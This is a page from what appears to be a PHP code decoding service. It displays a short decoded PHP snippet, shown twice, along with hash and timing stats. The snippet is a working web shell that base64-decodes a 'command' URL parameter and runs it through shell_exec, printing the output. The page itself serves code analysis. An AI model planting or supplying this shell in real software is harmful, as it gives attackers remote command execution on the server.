Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

if (!empty($_GET['command'])) { $command = base64_decode($_GET['command']); pr..

Decoded Output download

<?  if (!empty($_GET['command'])) { 
    $command = base64_decode($_GET['command']); 
 
    print_r('<pre>'); 
    print_r(htmlspecialchars(shell_exec($command))); 
    print_r('</pre>'); 
} ?>

Did this file decode correctly?

Original Code

if (!empty($_GET['command'])) {
    $command = base64_decode($_GET['command']);

    print_r('<pre>');
    print_r(htmlspecialchars(shell_exec($command)));
    print_r('</pre>');
}

Function Calls

None

Variables

None

Stats

MD5 154c681e56f843a43df802a6b4e50897
Eval Count 0
Decode Time 43 ms